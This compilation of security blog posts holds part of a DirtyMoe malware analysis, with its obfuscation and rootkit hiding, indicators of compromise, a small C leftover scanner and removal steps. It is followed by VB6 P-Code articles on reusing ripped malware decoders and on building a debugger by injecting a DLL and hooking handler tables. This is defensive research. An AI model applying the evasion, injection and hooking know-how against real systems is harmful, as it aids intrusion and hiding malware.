We detected the first significant occurrence of VMProtect at the end of 2018. The obfuscation via VMprotect has been continuously observed since 2019. Before VMProtect, the malware authors relied on common obfuscation methods that are still present in the VMProtected versions of DirtyMoe.

4. Self Protecting Techniques

Every good piece of malware must implement a set of protection, anti-forensic, anti-tracking, and anti-debugging techniques. DirtyMoe uses rootkit methods to hide system activities. Obfuscation is implemented via the VMProtect software and via its own encryption/decryption algorithm. Network communication uses a multilevel architecture so that no IP addresses of the mother servers are hardcoded. Last but not least, the DirtyMoe processes protect each other.

4.1 DirtyMoe Driver

The DirtyMoe driver provides a wide range of functionality; see the following short list:

  • Minifilter: manipulation (hide, insert, modify) of directory enumeration
  • Registry Hiding: can hide defined registry keys
  • Service Hiding: patches services.exe structures to hide a required service
  • Driver Hiding: can hide itself in the system

The DirtyMoe driver is a broad topic that we will discuss in a future post.

4.2 Obfuscation and VMProtect

The DirtyMoe code contains many malicious patterns that would be caught by most AVs. The malware author used VMProtect to obfuscate the DirtyMoe Service DLL file. The downloaded MOE objects are encrypted with symmetric ciphers using hardcoded keys. We have seen several MOE objects which contained, in essence, the same PE files differing only in their PE headers. Nevertheless, even these slight modifications were enough for the cipher to produce completely different MOE objects. Therefore, static detections cannot be applied to the encrypted MOE objects. Moreover, DirtyMoe does not dump a decrypted MOE object (PE file) to the file system but injects it directly into memory.

DirtyMoe stores its configuration in the following registry entry: HKLM\SOFTWARE\Microsoft\DirectPlay8\Direct3D

The configuration values are also encrypted by the symmetric cipher and hardcoded key. Figure 9 demonstrates the decryption method for the DirectPlay8\Direct3D registry key. A detailed explanation of the method will be published in a future post.

Figure 9. Decryption method for the Direct3D registry value

4.3 Anti-Forensic and Protections

As we mentioned in the Exploitation section, forensic and tracking methods are more complicated since the DirtyMoe workers are started through several processes and threads. The workers initially run as svchost.exe, but the DirtyMoe driver changes the workers' process names to fontdrvhost.exe. DirtyMoe has two worker processes (Core and Executioner) that guard each other. So, if one worker is killed, the other starts a new instance of it, and vice versa.

5. Symptoms and Deactivation

Although DirtyMoe uses advanced protection and anti-forensics techniques, several symptoms indicate the presence of DirtyMoe.

5.1 Registry

A marked indicator of DirtyMoe's presence is the registry key HKLM\SOFTWARE\Microsoft\DirectPlay8\Direct3D, in which DirtyMoe stores its configuration.

Additionally, if the system registry contains duplicate keys in the path HKLM\SYSTEM\CurrentControlSet\Services, it can point to unauthorized manipulation in the Windows kernel structures. The DirtyMoe driver implements techniques to hide registry keys that can cause inconsistency in the registry.

The MSI installer leaves the following flag if the installation is successful:
HKEY_LOCAL_MACHINE\SOFTWARE\SoundResearch\UpdaterLastTimeChecked[1-3]

5.2 Files

The working directory of DirtyMoe is C:\Windows\AppPatch. The DirtyMoe malware backs up the original SENS DLL to the working directory as Acpsens.dll.

Rarely, the DirtyMoe worker fails during .moe file injection, and the C:\Windows\AppPatch\Custom folder may contain unprocessed MOE files.

Sometimes, DirtyMoe “forgets” to delete a temporary DLL file used for the malware deployment. The temporary service is present in Windows services, and the service name follows the pattern ms<five-digit_random_number>app. So, the System32 folder can contain the DLL file in the form C:\Windows\System32\ms<five-digit-random-number>app.dll
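
A quick way to look for these leftovers; the wildcard mirrors the ms<five-digit>app.dll naming scheme, and note that a live DirtyMoe driver may hide the file from such a scan.

#include <windows.h>
#include <stdio.h>

int main(void)
{
    WIN32_FIND_DATAA fd;
    HANDLE h = FindFirstFileA("C:\\Windows\\System32\\ms?????app.dll", &fd);

    if (h != INVALID_HANDLE_VALUE) {
        do {
            printf("suspicious leftover: %s\n", fd.cFileName);
        } while (FindNextFileA(h, &fd));
        FindClose(h);
    }
    return 0;
}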

The MSI installer often creates a directory in C:\Program Files folder with the name of the MSI product name:
FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH or a similar format: [A-Z]{36}

5.3 Processes

On Windows 10, the DirtyMoe processes have no live parent process since the parent is killed due to anti-tracking. The workers are based on svchost.exe. Nonetheless, the processes are visible as fontdrvhost.exe under SYSTEM users with the following command-line arguments:

svchost.exe -k LocalService
svchost.exe -k NetworkService

5.4 Deactivation

It is necessary to stop or delete the DirtyMoe service named Ms<volume-id>App. Unfortunately, the DirtyMoe driver hides the service even in safe mode. So, the system should be booted from an installation disk to bypass the driver, and the service DLL file located at C:\Windows\System32\Ms<volume-id>App.dll should then be removed or renamed.

Then the DirtyMoe service will not start, and the following actions can be taken:

  • Remove Ms<volume-id>App service
  • Delete the service DLL file
  • Remove the core payload and their backup files from C:\Windows\AppPatch
    • Ke<five-digit_random_number>.xsl and Ac<volume-id>.sdb
  • Remove DirtyMoe Objects from C:\Windows\AppPatch\Custom
    • <md5>.mos; <md5>.moe; <md5>.mow

6. Discussion

Parts of the DirtyMoe malware have been seen throughout the last four years. Most notably, NSFOCUS Technologies described these parts as Nugget Phantom [1]. However, DirtyMoe needs an exploit kit for its deployment. We have clues that PurpleFox [5] and DirtyMoe are related. The open question is whether PurpleFox and DirtyMoe belong to different malware groups, whether PurpleFox is being paid to distribute DirtyMoe, or whether both malware families come from the same factory. Both have complex and sophisticated network infrastructures, so they could be the work of the same group.

The DirtyMoe authors are probably from China. The DirtyMoe service and MOE Modules are written in Delphi. On the other hand, the DirtyMoe driver is written in Microsoft Visual C++. However, the driver is composed of rootkit techniques that are freely accessible on the internet. The authors are not experienced rootkit writers, since the driver code contains many bugs copied from the internet. Moreover, Delphi malicious patterns would be easily detectable, so the authors have been using VMProtect for code obfuscation.

The incidence of PurpleFox and DirtyMoe has increased by an order of magnitude in the last year, and the expected trend indicates that DirtyMoe is, and will remain, very active. Furthermore, the malware authors seem to be a large and organized group. Therefore, DirtyMoe should be closely monitored.

7. Conclusion

Cryptojacking and DDoS attacks are still popular methods, and our findings indicate that DirtyMoe is still active and on the rise. DirtyMoe is a complex malware that has been designed as a modular system. PurpleFox is one of the most used exploit kits for DirtyMoe deployment. DirtyMoe can execute arbitrary functionality based on a loaded MOE object such as DDoS, etc., meaning that it can basically do anything. In the meantime, the malware aims at crypto-mining. 

The malware implements many self-defense and hiding techniques applied on local, network, and kernel layers. Communication with C&C servers is based on DNS requests and it uses a special mechanism translating DNS results to a real IP address. Therefore, blocking of C&C servers is not an easy task since C&C addresses are different each time and they are not hard-coded. 

Both PurpleFox and DirtyMoe are still active malware and are gaining strength. Attacks performed by PurpleFox significantly increased in 2020. Similarly, the number of DirtyMoe hits has also increased, since the two malware families are clearly linked. We have registered approximately 100k infected computers to date. In each case, DirtyMoe and PurpleFox are still active in the wild. Furthermore, one MOE object aims to worm into other machines, so PurpleFox and DirtyMoe will certainly increase their activity. Therefore, both should be closely monitored for the time being.

This article provided a high-level summary of the DirtyMoe malware. We described its deployment, installation, purpose, communication, self-protection, and statistics in general terms. The following articles in the DirtyMoe series will give a detailed description of the MSI installer package, the DirtyMoe driver, services, MOE objects, and other interesting topics related to the whole DirtyMoe architecture.

References


[1] Nugget Phantom Analysis
[2] Purple Fox Rootkit Now Propagates as a Worm
[3] EternalBlue Still Relevant
[4] Scripting Engine Memory Corruption Vulnerability
[5] Purple Fox malware

The post DirtyMoe: Introduction and General Overview of Modularized Malware appeared first on Avast Threat Labs.

Binary Reuse of VB6 P-Code Functions

19 May 2021 at 10:12

Reusing binary code from malware is one of my favorite topics. Binary re-engineering and being able to bend compiled code to your will is really just an amazing skill. There is also something poetic about taking malware decryption routines and making them serve you.

Over the years this topic has come up again and again. Previous articles have included emit based rips [1], exe to dll conversion [2], emulator based approaches [3], and even converting malware into an IPC based decoder service [4].

The above are all native code manipulations which makes them something you can work with directly. Easy to disassemble, easy to debug, easy to patch. (Easy being a relative term of course :))

Lately I have been working on VB6 P-Code, and developing a P-Code debugger. One goal I had was to find a way to call a P-Code function, ripped from a malware, with my own arguments. It is very powerful to be able to harness existing code without having to recreate it (including all of its nuances.)

Is this even possible with P-Code? As it turns out, it is possible, and I am going to show you how.

The distilled knowledge below is a small slice of what was unraveled during an 8 month research project into the VB6 runtime and P-Code instruction set.

This paper includes 11 code samples which showcase a wide variety of scenarios utilizing this technique [5].

Note on offsets
In several places throughout this paper there may be VB runtime offsets presented. All offsets are to a reference copy with md5: EEBEB73979D0AD3C74B248EBF1B6E770 [6]. Microsoft was kind enough to publish debug symbols for this build including those for the P-Code engine handlers.

Barriers to entry
The VB6 runtime was designed to load executables, dlls, and ocx controls in an undocumented format. This format contains many complex interlinked structures that layout embedded forms, class structures, dependencies etc. During startup the runtime itself also requires certain initialization steps to occur as it prepares itself for use.

If we wish to execute P-Code buffers out of the context of a VB6 host executable there are several hurdles we must overcome:

VB Runtime Initialization 

Standard runtime initialization for executables takes place through the ThunRTMain export. This is the primary entry point for loading a VB6 executable. This function takes 1 argument that is the address of the top level VB Header structure. This structure contains the full complex hierarchy of everything else within. 

While we can utilize this path for our needs, there are easier ways to go about it. Starting from ThunRTMain can also create some problems on process termination so we will avoid it. 

In 2003 when exploring VB6’s ability to generate standard dlls I found a second path to runtime initialization through the CreateIExprSrvObj export.

This export is simple to call and automatically performs the majority of runtime initialization. Some TLS structure fields however are left out. In testing, most things operate fine. The only errors discovered occur when trying to use native VB file commands, MsgBox or the built in App object.

With a little extra leg work it has been found that the TLS structures can be manually completed to regain access to most of this native functionality. 

Finally, if the P-Code buffer creates COM objects, a manual call to CoInitialize must also be performed.
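
A minimal sketch of this initialization path: only the export lookups and the COM initialization are shown, the prototypes of the runtime exports are deliberately left opaque, and the global names are mine.

#include <windows.h>
#include <objbase.h>

FARPROC g_pCreateIExprSrvObj;
FARPROC g_pProcCallEngine;

int init_vb_runtime(void)
{
    HMODULE rt = LoadLibraryA("msvbvm60.dll");
    if (!rt)
        return 0;

    g_pCreateIExprSrvObj = GetProcAddress(rt, "CreateIExprSrvObj");
    g_pProcCallEngine    = GetProcAddress(rt, "ProcCallEngine");

    /* only needed if the ripped P-Code creates COM objects */
    CoInitialize(NULL);

    return g_pCreateIExprSrvObj != NULL && g_pProcCallEngine != NULL;
}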

Replicating basic object structures

Once CreateIExprSrvObj has been executed, we can call into P-Code streams as many times as we want from our loader code. Structure initialization is minimal and only requires the following fields: 

If the P-Code routines utilize global variables then the codeObj.aModulePublic field will also have to be set to a writable block of memory. This has been demonstrated in the globalVar and complex_globals examples. We can even pre-initialize these variables here if we desire. 

In addition to filling out these primary structures, we also have to recreate the constant pool as expected by the specific P-Code. Finally we must also update a structure field in the P-Code to point to our current object Info structure. 

While this may sound complex, there is a generator utility which automatically does all of the work for you in the majority of cases. A more detailed explanation of the following code will be presented in later sections. 

Finding an entrypoint to transition into P-Code execution 

Execution of the VB6 P-Code occurs by calling the ProcCallEngine export of the VB runtime. The stub below is the same mechanism used internally by VB compiled applications to transfer execution between sub functions.
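
A minimal sketch of that call mechanism in MSVC x86 inline assembly, consistent with the description that follows: EDX receives the address of the target function's trailing structure and execution transfers through the runtime's ProcCallEngine export. The variable names are mine, and the exact stub emitted by compiled VB6 binaries may differ.

extern void *g_pProcCallEngine;   /* ProcCallEngine address resolved from the runtime */
extern void *offset_sub_main;     /* address of the target function's trailing structure */

__declspec(naked) void call_pcode_no_args(void)
{
    __asm {
        mov  edx, offset_sub_main              ; EDX -> RTMI / ProcDscInfo
        call dword ptr [g_pProcCallEngine]     ; enter the P-Code engine
        ret
    }
}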

The offset_sub_main argument moved into EDX is the address of the target P-Code function's trailing structure that defines attributes of the function. We will discuss this structure in the following sections. 

The asm stub above shows the default scenario of calling a P-Code function with no arguments. A video showing this running in a debugger is available [7]

In the decrypt_test example we explore how to call a ripped function with a complex prototype and a Variant return value. This example demonstrates reusing an extracted P-Code decoder from a malware executable. Here we can call the extracted P-Code function passing it our own data:

Understanding P-Code function layout 

P-Code functions in compiled executables are linked by a structure that trails the actual byte code. This structure is called RTMI in the VB runtime symbols, and the reversing community has taken to calling it ProcDscInfo. A partial excerpt of this structure is shown below: 

When we rip a P-Code function from a compiled binary, we must also extract the configured RTMI structure. ProcCallEngine requires this information in order to run a P-Code routine successfully. 

When we relocate the P-Code block outside of the target binary, we must also update the link to our new object Info table.

This is what is being set in the generated code: 

Here the rc4 buffer contains the entire ripped function, starting with the P-Code and then followed by the RTMI structure which starts at offset 0x3e4. We then patch in the address of our manually filled out object Info into the RTMI.pObjTable field. Once this is complete, the P-Code is ready for execution.

Code Generation 

When developing a method such as this, we must start with known quantities. For our purposes we are writing our own test code which is done normally in the VB6 Integrated Development Environment. This code is then extracted using a utility which generates the C or VB6 source necessary to execute it independently.

The generator tool we are using in this paper is the free VBDec [8] P-Code debugger. 

While exploring this technique, the sample code has been optimized to follow several conventions for clarity. For this research all code samples were ripped from functions in a single module. This design was chosen so that all sub function access occurs through the ImpAdCall* opcodes which draw directly against function pointers in the const pool. 

Code taken from instanced form or class compilation units would require support to replicate VTable layouts for the *Vcall opcodes. While this can be done I will leave that as future work for now.

Samples are available that make extensive use of callbacks to integrate tightly with the host code. This is useful for integrating debug output through the C host in a simple manner. 

Callbacks are accessed through the standard VB API Declare syntax which is a core part of the language and is well documented. Below are examples of sending both numeric and string debug info from the P-Code to the host. 

Giving VB direct access to the host functions is as simple as setting their addresses in the corresponding constant pool slots. 
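
On the host side such callbacks are plain __stdcall functions. A sketch is shown below; remember that a ByVal String in a VB Declare arrives as an ANSI pointer, and the pool slot numbers in the comment are made up.

#include <windows.h>
#include <stdio.h>

/* numeric progress value sent from the P-Code */
void __stdcall dbg_long(long value)
{
    printf("P-Code: %ld\n", value);
}

/* a ByVal String argument in a VB Declare is marshalled to an ANSI pointer */
void __stdcall dbg_string(const char *msg)
{
    printf("P-Code: %s\n", msg);
}

/* wiring them into the constant pool (slot indices are made up):
     const_pool[5] = (void *)dbg_long;
     const_pool[6] = (void *)dbg_string;                             */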

Ripping functions with VBDec is easy: right-click the function in the left-hand treeview and choose the Rip menu option. VBDec will generate all of the embedding data for you. Multiple functions can be ripped at once by right-clicking on the top-level module name. 

A corresponding const pool will also be auto-generated along with stubs to update the object Info pointers and asm stubs to call interlinked sub functions.

Once extraction/generation is complete it is left up to the developer to integrate the data into one of the sample frameworks provided.

A spectrum of samples are provided ranging from very simple, to quite complex. Samples include:

Sample Description
firstTest simple addition test
globalVar global variables test
structs passing structs from C to P-Code
two_funcs interlink two P-Code functions
ConstPool test decoding a binary const pool entry
lateBinding late bind sapi voice example
earlyBinding early bind sapi voice example
decrypt_test P-Code decryptor w/ complex prototype
Variant Data C host returns variant types from callback to P-Code.
benchmark RC4 benchmarking apps in C/P-Code code and straight C

Understanding the Const Pool 

Each compilation unit such as a module, class, form etc gets its own constant pool which is shared for all of the functions in that file. Pool entries are built up on demand as the file is processed by the compiler from top to bottom.

The constant pool can contain several types of entries such as: 

  • string values (BSTRs specifically) 
  • VB method native call stubs 
  • API import native call stubs 
  • COM GUIDs 
  • COM CLSID / IID pairs held in COMDEF structures 
  • CodeObject base offsets (not applicable to our work here) 
  • internal runtime COM objects filled out at startup (not supported) 

VBDec is capable of automatically deciphering these entries and figuring out what they represent. Once the correct type has been determined, it can generate the C or VB source necessary to fill out the const pool in the host code. The constant pool viewer form allows you to manually view these entries.

In testing it has performed extremely well, outputting complete const pools that require little to no modification. 

For callback integration with the host, if you use “dummy” as the dll name, it will automatically be assumed as a host callback. Otherwise it will be translated literally as a LoadLibrary/GetProcAddress call.

Some const pool entries may show up as Unknown. When you click on a specific entry the raw data at that offset will be loaded into the lower textbox. If this data shows all 00 00 00 00’s then this is a reference to an internal VB runtime COM object that would normally be set to a live instance at initialization.

This has been seen when using the App Object. Normally this would be set @6601802F inside _TipRegAppObject function of the runtime on initialization. These types of entries are not currently supported using this technique (and would not make sense in our context anyways.) 

Interlinked sub functions are supported. A corresponding native stub will be generated along with an entry in the const pool for it. 

Early binding and late binding to COM objects is also supported. Late binding is done entirely through strings in the const pool. For early binding you will seen a COMDEF structure and CLSID / IID data automatically generated.

The following is taken from the early binding sample which loads the Sapi.SpVoice COM object. 

Generation of this code is generally automatic by VBDec but there may be times where the tool can not automatically detect which kind of const pool entry is being specified. In these cases you may have to manually explore the const pool and extract the data yourself.

In the above scenario the file data at the const pool address may look similar to the following:

If we visualize this as a COMDEF structure we can see the values 0, 0x401230, 0x401240, 0. Looking at the file offsets for these virtual addresses we find the GUIDs given above. 
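
Interpreted as a structure, those four dwords suggest a layout along these lines; the field names and the CLSID/IID ordering are my assumptions.

#include <windows.h>

/* Assumed shape of a COMDEF const pool entry: two zero fields framing
   pointers to the CLSID and IID data found at the listed addresses.  */
typedef struct COMDEF {
    DWORD       reserved0;   /* 0x00000000                    */
    const GUID *pClsid;      /* e.g. 0x00401230 -> CLSID data */
    const GUID *pIid;        /* e.g. 0x00401240 -> IID data   */
    DWORD       reserved1;   /* 0x00000000                    */
} COMDEF;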

String entries are held as BSTRs, which are length-prefixed unicode strings. Since we are in complete control of the const pool, and BSTRs can encapsulate binary data, it is possible to include encrypted strings directly in the const pool using SysAllocStringByteLen. The binary_ConstPool* samples demonstrate this technique. You can also dynamically swap out const pool entries to change functionality as the P-Code runs. An example of this is found in the early bind sample. 

Note: It is important to use the SysAlloc* string functions to get real BSTR’s for const pool entries. As the strings get used by the runtime, it may try to realloc or release them.
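
A sketch of stashing binary (for example, encrypted) data into a pool slot as a genuine BSTR; the slot index and the helper name are illustrative.

#include <windows.h>
#include <oleauto.h>

/* SysAllocStringByteLen produces a real, length-prefixed BSTR that can
   carry embedded NULs, so the runtime can realloc or free it safely.  */
void set_binary_pool_entry(void **const_pool, int slot,
                           const char *data, UINT byte_len)
{
    const_pool[slot] = SysAllocStringByteLen(data, byte_len);
}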

Extended TLS Initialization

The VB6 runtime stores several key structures in Thread Local Storage (TLS). Several functions of the runtime require these structures to be initialized. These structures are critical for VB error handling routines and can also come into play for file access functions.

Below is the code for the rtcGetErl export. This function retrieves the user specified error line number associated with the last exception that occurred.

From this snippet of code we can see that the runtime stores the TLS slot value at offset 66110000. Once the actual memory address is retrieved with TlsGetValue, the structure field at offset 0x98 is returned as the stored last error line number. In this manner we can begin to understand the meaning of the various structure offsets.

Even without a full analysis of the complete 0xA8 byte structure, we can compare the values seen in a fully initialized process with those in a process initialized through the CreateIExprSrvObj export.

Once diffed, two main empty slots are observed which normally point to other allocations.

  • field 0x18 – normally set @ 66015B25 in EbSetContextWorkerThread
  • field 0x48 – normally set @ 66018081 in RegAppObjectOfProject

Field 0x48 is used for access to the internal VB App. COM object. This object does not make sense to use in our scenario and does not trigger any exceptions if left blank. If we had to replicate the COM object for compatibility with existing code we could however insert a dummy object.

The allocation at offset 0x18 is only required if we wish to use built in VB file operation commands or the MsgBox function.

For compatibility with ripped code that demands it, it was interesting to see whether a manual allocation would allow the runtime to operate properly.

The following code was created to dynamically lookup the TLS slot value, retrieve the tlsEbthread memory offset and then manually link in a new allocation to the missing 0x18 field.
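
The original listing is not reproduced here, so the snippet below is only a minimal sketch of the idea: read the slot variable at the reference runtime's 0x66110000, fetch the per-thread structure with TlsGetValue, and hang a fresh allocation off the empty 0x18 field. The allocation size is a guess.

#include <windows.h>
#include <stdlib.h>

void patch_tls_field_0x18(void)
{
    DWORD slot     = *(DWORD *)0x66110000;       /* TLS index saved by the runtime */
    BYTE *ebthread = (BYTE *)TlsGetValue(slot);  /* per-thread runtime structure   */

    if (ebthread && *(void **)(ebthread + 0x18) == NULL)
        *(void **)(ebthread + 0x18) = calloc(1, 0x1000);  /* size is a guess */
}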

Once the above allocation was linked in, full access was restored to the native VB file access functions. Again, this extended initialization is not always required.

Debugging integration’s 

When testing this technique it is best to start with your own code that you control. This way you can get familiar with it and develop a feel for working with (and recognizing) the different function prototypes.

The first step is to write and debug your VB6 code as normal in the VB6 IDE. In preparation for running it as a byte buffer, you can then pepper the VB code with progress callbacks to API Declare routines which would normally access C dll exports. You don't actually have to write the dll, but you can. The calls are identical when hosted internally from a native C loader (or even a VB-hosted AddressOf callback routine). 

If you are calling into a P-Code function with a specific prototype, this is the trickiest part of the integration. Samples are available which pass in int, structures, references, Variants, bools and byte arrays. You will have to be very aware if arguments are being passed in ByVal, or the default ByRef (pointers).

Also pay attention to the function return types. If no argument/return type is defined, it defaults to a COM Variant. VB functions receive variant return values by pushing an extra empty one onto the stack before calling the function. Simple numeric return values are passed back in EAX as normal.

When interacting with callbacks make sure the callbacks are defined as __stdcall. All of the standard VB6 <–> C development knowledge applies. You can cut your teeth on these rules by working with standard C dlls and debugging in Visual Studio from the dll side while launching a VB6 exe host.

When in doubt you can create simple tests to debug just the function prototypes. For the complex prototype decryptor sample given above, I had the VB6 sub main() code call the rc4 function with expected parameters to test it in its natural environment. I could then debug the VB6 executable to watch the exact stack parameters passed to develop more insight into how to replicate it manually from my C loader.

This can be done with a native debugger by setting a breakpoint @6610664E on the ImpAdCallFPR4 handler in the VB runtime. Here you could examine the stack before entry into the target P-Code function. VBDec’s P-Code debugger is also convenient for this task.

When debugging it is best to have the reference copy of the VB runtime in the same directory as the target executable so that all of your offsets line up with your runtime disassembly with debug symbols. If you use IDA as your debugger, start with the disassembly of the VB runtime and set the target executable in the debugger options. Asm focused debuggers such as Olly or x64dbg are highly recommended over Visual Studio which is primarily based around source code debugging. 

Conclusion:

When working on malware analysis it is a common task to have to interoperate with various types of custom decoding routines. There are multiple approaches to this. One can sit down and reverse engineer the entire routine and make sure your code is 100% compatible, or you can try to explore rip based techniques. 

Ripping decoders is a fairly common task in my personal playbook. While researching the internals of the VB runtime it was a natural inquiry for me to see if the same concept could be applied to P-Code functions. 

With some experimentation, and a suitable generator, this technique has proven stable and relatively easy to implement. These experiments have also deepened my insights into how the various structures are used by the runtime and my appreciation for how tightly VB6 can integrate with C code. 

Hopefully this information will give you a new arrow to add to your quiver, or at least have been an interesting ride. 



Writing a VB6 P-Code Debugger

12 May 2021 at 12:46

Background

In this article we are going to discuss how to write a debugger for VB6 P-Code. This has been something I have always wanted to do ever since I first saw the WKTVBDE P-Code debugger written by Mr Silver and Mr Snow back in the early 2000s.

There was something kind of magical about that debugger when I first saw it. It was early in my career, I loved programming in VB6, and reversing it was a mysterious dark art.

While on sabbatical I finally found the time to sit down and study the topic in depth. I am now sharing what I discovered along the way.

This article will build heavily on the previous paper titled VB P-Code Disassembly [1]. In that paper we detailed how the runtime processes P-Code and transfers execution between the different handlers.

It is this execution flow that we will target to gain control with our debugger.

An example of the debugger architecture detailed in this paper can be found in the free vbdec P-Code disassembler and debugger.

Probing

When I started researching this topic I wanted to first examine what a process running within the WKTVBDE P-Code debugger looked like.

A test P-Code executable was placed alongside a copy of the VB runtime with debug symbols[2]. The executable was launched under WKTVBDE and then a native debugger was attached.

Examining the P-Code function pointer tables at 0x66106D14 revealed that all the pointers had been patched to point to a single function inside WKTVBDE.dll.

This gives us our first hint at how they implemented their debugger. It is also worth noting at this point that the WKTVBDE debugger runs entirely within the process being debugged, GUI and all!

To start the debugger, you run loader.exe and specify your target executable. It will then start the process and inject WKTVBDE.dll into it. Once loaded, WKTVBDE.dll will hook the entire base P-Code handler table with its own function, giving it first access to whatever P-Code is about to execute.

The debugger also contains:

  • a P-Code disassembler
  • ability to parse all of the nested VB internal structures
  • ability to list all code objects and control events (like on timer or button click)

This is in addition to the normal debugger UI actions such as data dumping, breakpoint management, stack display etc.

This is A LOT of complex code to run as an injection dll. Debugging all of this would have been quite a lot of work for sure.

With a basic idea of how the debugger operated, I began searching the web to find any other information I could. I was happy to find an old article by Mr Silver on Woodmann that I have mirrored for posterity [3].

In this article Mr Silver lays out the history of their efforts in writing a P-Code debugger and gives a template of the hook function they used. This was a very interesting read and gave me a good place to start.

Design Considerations:

Looking forward, there were some design decisions I wanted to change in this architecture.

The first change was to move all of the structure parsing, disassembler engine, and user interface code into its own standalone process. These are complicated tasks and would be very hard to debug as a DLL injection.

To accomplish this task we need an easy-to-use, stable inter-process communication (IPC) technique that is inherently synchronous. My favorite technique in this category is using Windows Messages, which automatically cause the sending process to wait until the receiving window procedure has completed before SendMessage returns.
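
A minimal sketch of the sender side, assuming the UI registers a window for this purpose (the class name and message layout are placeholders of mine): the injected dll finds the UI window and sends a WM_COPYDATA, and the call does not return until the UI's window procedure has handled it.

#include <windows.h>
#include <string.h>

void ReportToUi(const char *text)
{
    /* the out-of-process debugger GUI owns this window (hypothetical class name) */
    HWND hUi = FindWindowA("PCodeDebuggerUI", NULL);
    if (hUi == NULL)
        return;

    COPYDATASTRUCT cds;
    cds.dwData = 1;                          /* arbitrary message type: step notification */
    cds.cbData = (DWORD)strlen(text) + 1;
    cds.lpData = (PVOID)text;

    /* this thread blocks here until the UI's window procedure returns */
    SendMessageA(hUi, WM_COPYDATA, 0, (LPARAM)&cds);
}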

I have used this technique extensively to stall malware after it unpacks itself [4]. I have even wired it up to a Javascript engine that interfaces with a remote instance of IDA [5].

This design will give us the opportunity to freely write and debug the file format parsing, disassembly engine, and user interface code completely independent of the debugger core.

At this point debugger integration essentially becomes an add-on capability of the disassembler. The injection dll now only has to intercept execution and communicate with the main interface.

For the remainder of this paper we will assume that a fully operational disassembler has already been created and only focus on the debugger specific details.

For discussions on how to implement a disassembler and a reference implementation on structure parsing please refer to the previous paper [1].

Implementation

With sufficient information now in hand it was time to start experimenting with gaining control over the execution flow.

Our first task is figuring out how to hook the P-Code function pointer table. Before we can hook it, we actually need to be able to find it first! This can be accomplished in several ways. From the WKTVBDE authors' paper it sounds like they progressed in three main stages. First, they started with a manually patched copy of the VB runtime, with the modified dll referenced in the import table.

Second, they progressed to a single supported copy of the runtime with hardcoded offsets to patch, with a loader now injecting the debugger dll into the target process. Finally, they added the ability to dynamically locate and patch the table regardless of runtime version.

This is a good experimental progression which they detail in depth. The second stage is readily accessible to anyone who can understand this paper and will work sufficiently well. I will leave the details of injection and hooking as an exercise to the reader.

The basic steps are (a minimal C sketch follows the list):

  • set the memory writable
  • copy the original function pointer table
  • replace original handlers with your own hook procedures
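
The sketch below implements those steps, assuming the table address has already been located; the names and the 256-entries-per-table size follow the description in this article, and this is not the actual vbdec implementation.

#include <windows.h>
#include <string.h>

#define TBL_ENTRIES 256
typedef void (*PCODE_HANDLER)(void);

static PCODE_HANDLER g_origTable[TBL_ENTRIES];   /* saved copy of the original handlers */

/* pTable: address of one of the runtime's handler tables (already located);
   hook:   our replacement procedure for every opcode slot in that table */
BOOL HookDispatchTable(PCODE_HANDLER *pTable, PCODE_HANDLER hook)
{
    DWORD oldProt;
    SIZE_T size = TBL_ENTRIES * sizeof(PCODE_HANDLER);

    /* set the memory writable */
    if (!VirtualProtect(pTable, size, PAGE_EXECUTE_READWRITE, &oldProt))
        return FALSE;

    /* copy the original function pointer table */
    memcpy(g_origTable, pTable, size);

    /* replace original handlers with our own hook procedure */
    for (int i = 0; i < TBL_ENTRIES; i++)
        pTable[i] = hook;

    VirtualProtect(pTable, size, oldProt, &oldProt);
    return TRUE;
}

Saving the original pointers is what later lets the hook chain execution on to the real handler after the UI has been notified.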

The published sample also made use of self-modifying code, which we will seek to avoid. To get around this we will introduce individual hook stubs, one per table, to record some additional data.

Before we get into the individual hook stubs, we notice they stored some run time/state information in a global structure. We will expand on this with the following:
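
The published listing is not included here; as a stand-in, the sketch below is a hedged guess at the kind of fields involved, with field names of my own.

#include <windows.h>

/* Illustrative only: state recorded between the per-table stubs, the
   universal hook procedure, and the remote UI. */
typedef struct _VM_STATE {
    BYTE  *currentOpcodeVA;   /* address of the opcode byte being executed */
    DWORD  leadByte;          /* 0 for the base table, 0xFB-0xFF for the lead tables */
    void **tableBase;         /* dispatch table the current opcode was read from */
    DWORD  stepMode;          /* run / single-step / break-on-next, set by the UI */
    BYTE  *lastStackPtr;      /* ESP observed on entry, for stack diffing */
} VM_STATE;

VM_STATE g_vm;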


From the hooking code you will notice that all of the base opcodes in the first table (excluding the lead byte handlers) received the same hook. The Lead_X bytes at the end each received their own procedure.

Below shows samples of the hook handlers for the first two tables. The other 4 follow the same pattern:

The hooks for each individual table configure the global VM structure fields for current lead byte and table base. The real meat of the implementation now starts in the universal hook procedure.


In the main PCodeHookProc you will notice that we call out to another function defined as: void NotifyUI().

It is in this function where we do things like check for breakpoints, handle single stepping etc. This function then uses the synchronous IPC to talk to the out of process debugger user interface.

The debugger UI will receive the step notification and then go into a wait loop until the user gives a step/go/stop command. This has the effect of freezing the debuggee until the SendMessage handler returns. You can find a sample implementation of this in the SysAnalyzer ApiLogger source [6].

The reason we call out to another function from PCodeHookProc is that PCodeHookProc itself is written as a naked function in assembler. Once free from that constraint we can easily implement more complex logic in C.
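
As a hedged sketch of what NotifyUI might look like, building on the g_vm structure and the ReportToUi sender sketched earlier (the breakpoint storage and step flag are again simplifications of mine):

#include <windows.h>
#include <stdio.h>

#define MAX_BP 64

extern VM_STATE g_vm;                  /* global state filled in by the hook stubs */
static BYTE *g_breakpoints[MAX_BP];    /* P-Code addresses set remotely by the UI */
static BOOL  g_singleStep = TRUE;      /* toggled over the IPC back channel */

void ReportToUi(const char *text);     /* synchronous WM_COPYDATA sender from earlier */

void NotifyUI(void)
{
    BOOL stop = g_singleStep;

    for (int i = 0; i < MAX_BP && !stop; i++)
        if (g_breakpoints[i] == g_vm.currentOpcodeVA)
            stop = TRUE;               /* breakpoint hit */

    if (stop) {
        char msg[64];
        sprintf(msg, "step %p", (void *)g_vm.currentOpcodeVA);
        ReportToUi(msg);               /* blocks this thread until the UI says continue */
    }
}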

Further steps:

Once all of the hooks are implemented you still need a way to exercise control over the debuggee. When the code is being remotely frozen, the remote GUI is actually still free to send the frozen process new commands over a separate IPC back channel.

In this manner you can manage breakpoints, change step modes, and implement lookup services through runtime exports such as rtcTypeName.

The hook dll can also patch in custom opcodes. The code below adds our own one byte NOP instruction at unused slot 0x01.
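
The original code is not reproduced here; the following is a sketch of the idea under the handler conventions covered in the disassembly article, written as 32-bit MSVC inline assembly and reusing names from the earlier hooking sketch. For brevity it dispatches through the saved original table; a real debugger would dispatch through the hooked table so tracing continues.

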